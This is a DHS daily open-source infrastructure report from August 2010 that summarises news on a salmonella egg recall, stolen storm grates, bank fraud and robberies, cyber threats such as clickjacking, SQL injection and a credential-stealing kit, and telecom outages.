Department of Homeland Security Daily Open Source Infrastructure Report

Thursday, August 19, 2010

Complete DHS Daily Report for August 19, 2010

Daily Report

Top Stories

• An Iowa egg producer is recalling 228 million eggs after being linked to an outbreak of salmonella poisoning, according to Associated Press. The federal Centers for Disease Control and Prevention said eggs from Wright County Egg in Galt, Iowa, were linked to several illnesses in Colorado, California and Minnesota. (See item 29)

29. August 17, Associated Press – (National) 228M eggs recalled following salmonella outbreak. An Iowa egg producer is recalling 228 million eggs after being linked to an outbreak of salmonella poisoning. The federal Centers for Disease Control and Prevention (CDC) said eggs from Wright County Egg in Galt, Iowa, were linked to several illnesses in Colorado, California and Minnesota. The CDC said about 200 cases of the strain of salmonella linked to the eggs were reported weekly during June and July, four times the normal number of such occurrences. State health officials said tainted eggs have sickened at least 266 Californians and seven in Minnesota. The eggs were distributed around the country and packaged under the names Lucerne, Albertson, Mountain Dairy, Ralph’s, Boomsma’s, Sunshine, Hillandale, Trafficanda, Farm Fresh, Shoreland, Lund, Dutch Farms and Kemp. The Food and Drug Administration (FDA) is investigating. In a statement, company officials said the FDA is “on-site to review records and inspect our barns.” The officials said they began the recall August 13. Source:

• The Kitsap Sun reports that stormwater grates have been vanishing in South Kitsap, Washington, creating a dangerous hazard and running up a bill as the county scrambles to replace them. (See item 34)

34. August 16, Kitsap Sun – (Washington) South Kitsap’s stormwater grates are disappearing ... but why? Stormwater grates have been vanishing in South Kitsap, Washington, creating a dangerous hazard and running up a bill as the county scrambles to replace them. Thirty-one grates have been taken since July 21, according to the Kitsap County Public Works Department. The sales manager at Navy City Metals in Gorst said the 31 covers, combined, are probably worth about $200 as scrap metal. Each cast-iron-and-steel cover weighs about 70 pounds, said the assistant director of public works. The cost to the county is much greater. The grates cost $82 a pop to replace, or at least $2,500. Officers ares placing cones or markers around the holes until public works can fasten in new grates. So far, no one’s been hurt. Officers previously have seen grates removed and thrown in storm drains, but this is the first time they’ve been stolen. As they replace the covers, crews are bolting them down to make them harder to steal. But that also makes them harder to remove for maintenance. Metal recyclers in Kitsap and Pierce counties have been notified of the thefts. There are more than 10,500 such covers in the county. Source:


Banking and Finance Sector

15. August 18, Myrtle Beach Sun News – (National) Myrtle Beach man charged in Ponzi scheme. A Myrtle Beach man and two California residents have been arrested on charges of operating a $26 million Ponzi scheme that victimized hundreds of investors nationwide. Federal prosecutors said recently that a suspect of Myrtle Beach, and two other people of Oxnard, California, were arrested by FBI agents. According to a federal grand jury indictment returned August 4, the defendants asked about 700 victims to invest in “ad toppers,” or advertising monitors on gas pumps, vending machines and ATMs. The defendants are accused of spending most of the investors’ money on personal expenses. Source:

16. August 18, Bend Bulletin – (Oregon) Local credit union warns of scam. Mid Oregon Credit Union warned its customers August 17 that someone has been pretending to be the credit union, calling customers on the phone with claims that their debit cards had been compromised and asking the customers for their card numbers. Mid Oregon said in a news release that it will never solicit customers via phone, e-mail or text message. The credit union said it took precautions to protect the accounts of members who were called. Source:

17. August 17, Boston Globe – (Massachusetts) FBI seeks female bank robber in Boston heists. Law enforcement officials are seeking a woman they believe robbed two Boston banks in late July and early August. The woman robbed the First Trade Union bank in Boston August 2 and five days earlier the City of Boston Credit Union in Dorchester, according to the FBI. Both times she wore a baseball cap, sliding a demand note to the teller and threatening them, then taking off on foot with the money. Witnesses told authorities she also carried a gun during one of the robberies, according to the FBI. Source:

18. August 16, Gwinnett Daily Post – (Georgia) FBI: Robbers hit Atlanta, Norcross banks. The FBI is searching for two wig-wearing, gun-wielding robbers suspected of hitting two metro Atlanta Wachovia banks, including a Norcross, Georgia branch. In both alleged heists, one armed suspect vaulted over a teller counter to snatch cash while his accomplice ordered lobby patrons to the ground at gunpoint. The suspects made off with an undisclosed amount of money each time, and no injuries were reported, said a FBI Atlanta spokesman. The latest heist happened about 10:30 a.m. August 16 at a 3374 Holcomb Bridge Road bank in Norcross. Two similar-looking men had used the same modus operandi about 10:44 a.m. July 27, when they held up a branch at 2725 Clairmont Road in Atlanta. Source:

19. August 16, WOOD 8 Grand Rapids – (Michigan; California) State: 400 investors lost $50M in scams. Three West Michigan companies and a California firm cost consumers about $50 million in alleged scams, according to Michigan regulators. At the center of the thefts is a suspect who ran several investment companies, including Diversified Global Finance and Diversified Liquid Asset Holdings. The Byron Center, Michigan man was selling his schemes through American Benefits Concepts, a Kalamazoo firm that also was selling an alleged scam product created by a California company. Now, the Michigan Office of Financial and Insurance Regulation has ordered all four companies to stop selling unregistered securities. The deals were “allegedly fraudulent real estate, ethanol, hedge fund and short-term loan investment scams,” the regulators said. Ever since the FBI began a criminal investigation and the alleged misdeeds became public last fall, those companies reportedly have ended such operations. But Michigan is saying there are 400 investors who have lost $50 million in these schemes. And there were warning signs victims may have missed, regulators said. Source:

Information Technology

50. August 18, Help Net Security – (International) DDoS threat spam targets domain owners. An interesting and not that often seen approach to make users part with their hard-earned cash has been spotted by Symantec. In the e-mail in question, the spammer professes to be a hacker with a network of computers at his disposal large enough to execute a DDoS attack on users’ Web sites, and requests the recipients to send him $200 to prevent his use of this network against their Web sites: The “To” field contains the e-mail address that is provided by the registrant in the contact details for the domain (which can be discovered using a simple whois lookup), and the “Subject” header says “Hosting - Important Updates and Information” - making it look like the e-mail is coming from the hosting service provider. Symantec said the spelling mistakes in the e-mail are intentional, so that the message can evade content-based antispam filters. But, in this case, they can also lend a certain amount of credibility to the sender, since the name of the “hack project” sounds Slavic in origin. Perfect knowledge of the English language would, in this case, probably raise more suspicion. Source:

51. August 18, The Register – (International) Clickjacking threat punts Facebook survey scam. Miscreants have unleashed a new type of clickjacking worm on Facebook. It tricks users into using the Facebook “Share” feature without notifying surfers content is being shared. By contrast, an otherwise similar clickjacking attack dating back from May relied on duping a user into injudicious use of the social network’s “Like” feature. Sophos explains that the latest attack poses as a “Facebook fan page” for the “Top 10 Funny T-Shirt Fails ROFL” and other potentially eye-catching content. These fan pages, once selected, load malicious script from an external domain that means the user will unwittingly share the dodgy page on their profile, promoting the scam to a mark’s friends and contacts on Facebook. Prospective marks running the NoScript Firefox plug-in are protected from the line of attack, which continues with a supposed “human verification step”. Marks are invited to complete a time-wasting survey before they are allowed to view the T-shirts. The scammers earn money from completed surveys from dodgy marketing outfits. Sophos reports that marks must submit cell phone numbers, which are enrolled into an auto renewing subscription service that costs $5 per week. Details of the terms and conditions of enrollment onto the Awesome Test are buried in small print. Facebook responded promptly to the appearance of the threat by deleting fan pages associated with the scam. Meanwhile Sophos has blocked the domain hosting the malicious code. Source:

52. August 17, The Register – (International) hit in latest mass hack attack. A hack attack that can expose users to malware exploits has infected more than 1 million Web pages, at least two of which belong to Apple. The SQL injection attacks bombard the Web sites of legitimate companies with database commands that attempt to add hidden links that lead to malware exploits. While most of the sites that fell prey appear to belong to mom-and-pop operations, two of the infections hit pages Apple uses to promote iTunes podcasts, a Google search shows. The malicious links appear to have been removed since Google last indexed the pages in early August. In all, at least 538,000 pages have been compromised by the same attack. Attacks that bare similar fingerprints but point to different domains have claimed close to 500,000 more. “These attacks have been ongoing and are changing pretty often,” said a senior researcher with ScanSafe, a Cisco-owned service that provides customers with real-time intelligence about malicious sites. “Interestingly, many of the sites compromised have been involved in repeated compromises over the past few months. It’s not clear whether these are the work of the same attackers or are competing attacks.” Source:

53. August 17, Computerworld – (International) Adobe to patch Reader zero-day bug Thursday. Adobe said August 17 that it would patch a critical Reader vulnerability August 19. Two weeks ago, Adobe had promised to fix the flaw during the week of August 16 with an emergency, or “out-of-band” security update, but had not slated a specific date. Computerworld had pegged the likely release date as August 17 based on past Adobe practice of issuing many of its security updates on Tuesdays. The bug Adobe plans to patch was disclosed by a researcher at last month’s Black Hat security conference, when he demonstrated how the open-source BitBlaze toolkit could be used to boost bug-hunting productivity.The researcher, an analyst with Baltimore-based Independent Security Evaluators, is well-known for finding vulnerabilities in Adobe’s popular Reader PDF viewer. Last March, he showed how a simple fuzzing tool could root out scores of potential bugs in Reader and other software. The researcher said the vulnerability is in Reader’s and Acrobat’s font parsing, but is not connected with the PDF font parsing flaw exploited by hackers to “jailbreak” Apple’s iOS 4 earlier this month. Apple patched the font vulnerability August 11. Source:

54. August 17, Help Net Security – (International) Facebook Hacker: A dangerous tool. Phishing is the weapon of choice for cybercriminals after log-in credentials. However, a new attack tool –- Facebook Hacker — has drawn attention to people desiring passwords and usernames that are not theirs. This kit helps wrongdoers steal log-in credentials without the user even having to type anything. The kit is intuitive and easy to configure. There are only two fields that need filling in: a disposable e-mail and a password that will constitute the location where the stolen information is delivered. After clicking the “build” button, a server.exe file is created and deposited into the facebook Hacker folder along with the initial files. The server.exe file is sent to intended victims. Once run, the malicious tool will snatch the victim’s facebook account credentials, along with all usernames and passwords users have asked browsers to remember. In order to successfully collect passwords, the malicious binary includes applications able to squeeze data out of the most popular browsers on the market, as well as out of almost all available instant messaging clients. The application also enumerates all dialup/VPN entries on the computer and displays their log-on details: user name, password, and domain. To avoid detection, the facebook Hacker will also look for all the processes related to a security suite and kill them upon detection. The kit is accessorized with a hard-coded list of processes associated with AV solutions that are to be checked and stopped, if found. The malware also looks for network monitoring applications and terminates them. This is a safety measure that will prevent curious users from seeing their passwords leave the system. Source:

55. August 17, The Register – (International) Mozilla eases fears over phishy URL alert. Mozilla developers have eased concerns about the severity of a security feature in Firefox that often fails to warn users when they have encountered obfuscated URLs that might lead to malicious Web sites. Developers of the open-source browser have known of the warning bypass since June. Under most circumstances, Firefox will display a warning when users click on links that contain addresses that have been obfuscated to hide their true destination. But when users encounter encoded URLs in inline frames embedded in a Web page, no such alert is delivered. “This impacts user security because obfuscated links in the iframes might trick the user to visit false links,” the person reporting the behavior wrote. On August 17, the same person, who is a researcher from Web security firm Armorize, repeated the warning. “In certain cases, it can be used effectively in spreading malware and stealing sensitive information,” the researcher wrote on the Armorize blog. But Mozilla said August 17 they don’t believe the behavior represents much of a risk because the obfuscated links are not visible during normal surfing, anyway. The statement reminded everyone that Firefox ships with protection that automatically warns users when they’re about to access pages identified in phishing or malware scams. Source:

Communications Sector

56. August 18, – (Oklahoma) A lightning strike knocks Cox stations in Tulsa off the air. A rainstorm packing strong winds and lightning was the reason all five Cox-owned radio stations in Oklahoma were knocked off the air early August 17. Radio-Info has been told that an air-to-ground lightning strike directly hit the building at 10:02 a.m., knocking News Talk KRMG-AM/FM (740/102.3), KWEN-FM (95.5), KRAV-FM (96.5) and KJSR-FM “Star” (103.3) off the air, along with their Web site streams. An engineer at Cox Radio-Tulsa said it took nearly two hours for a team of engineers to get all of the station’s transmitters back in operation. All online streams were resumed, except for KRMG, which was still out of action at 1:45 p.m. The engineer said the the Tulsa area has suffered though a spell of no rain and hot, 100 degree weather as of late. The lightning strike had a minimal effect on building power but had a major impact on the transmitters. Source:

57. August 18, Jackson County Floridian – (Florida) Communications blackout. A fiber optic line was cut in Cottondale, Florida, early August 17, leaving land lines, cellular phone service and Internet inoperable for about six hours. The outage affected individuals and businesses across Jackson and Holmes counties. CenturyLink customers across the two counties were left without long distance phone and Internet service from about 8:30 a.m. to 2:30 p.m., according to a regional representative for CenturyLink. Cellular phone service was affected because the wireless system has to tie into a land line. The fiber that was cut disconnected the wireless network from the landline system, according to a regional representative for Verizon Wireless. It is not known who cut the cable. It was an “external party” and not CenturyLink, the representative said. Emergency services were affected in the two counties. The Bonifay Police Department sent a press release indicating it was sent through a Mediacom cable account, an Internet service provider, which appeared to be unaffected by the outage. Washington County was not affected by the outage, and it was assisting with dispatch for Jackson and Holmes counties, according to an official at the Washington County Sheriff’s Office. Basic 911 service was available in Jackson County. However, the “enhanced” part of 911 service that provides the locations from where calls are made was down. Sheriff’s office officials had to rely on transmitting information through radios, because patrol vehicle computers couldn’t be used to communicate with dispatchers. Source:

58. August 17, IDG News Service – (National) FCC: Consumers get half of advertised broadband speed. The actual download speeds consumers get are about half of those promised by service providers, according to a report released this week by the Federal Communications Commission (FCC). In 2009, U.S. residential consumers subscribed to broadband services with an average and median advertised download speed of 7 Mbps to 8 Mbps, respectively, the FCC said. But the actual average speed they received was 4 Mbps, and the actual median speed was 3 Mbps. The FCC criticized the use of maximum rather than actual speeds, and said it will support efforts to develop a better way to represent bandwidth. The maximum advertised speed ignores network congestion, underperforming computers and routers, and Web sites, and applications that are not optimized, the FCC said. “Yet this ‘up to’ speed is commonly the only metric that can be used to compare the speeds of different broadband offerings. The ‘up to’ speed, however, does not provide an accurate measure of likely end-user broadband experience,” the FCC wrote in the report, released August 17. Source:

59. August 17, Charleston State Journal – (West Virginia) Satellite phone reports explosion, causes delays. A spokesman for Chief Well Gas told Marshall County, West Virginia, commissioners that an employee used a satellite phone to report the June 7 gas explosion. They have since learned that phone call was diverted to Texas, and it made locating the explosion difficult. Officials said all of that led to a delayed response in getting to the scene. Seven people were injured in the explosion. Company officials now say that six of those workers are back on the job. Commissioners held an emergency meeting August 17 to try and improve communications. One county commissioner asked gas companies to consider contributing money to improve cell phone towers for better communications in remote areas of the county. Source:

60. August 17, TechWorld – (International) Facebook popularity eats company bandwidth. Employees in the U.K. are now so fascinated with Facebook that they access it more often than any other single Web site or service, including, incredibly, Google search. According to Network Box’s latest 14 billion URL survey of traffic through its managed servers, Facebook now consumes 4.5 percent of corporate bandwidth, or just over 7 percent of all outward business traffic, equivalent to over 1 billion hits and rising in the second quarter. Only the video-based YouTube beats Facebook for corporate bandwidth consumption, consuming a startling 10.2 percent, but in terms of visits, Google is still way behind at 3.9 percent. Other notable bandwidth consumers include Yahoo’s image server, Yimg, which uses 2.9 percent of bandwidth and generated 2.9 percent of hits, and Windows updates, which accounts for 2.3 percent of hits. Leaving aside search engines, which can claim to have legitimate business uses, it is clear that traffic to consumer Web sites such as Facebook and YouTube is now a major use for business networks whether companies approve or not. Source: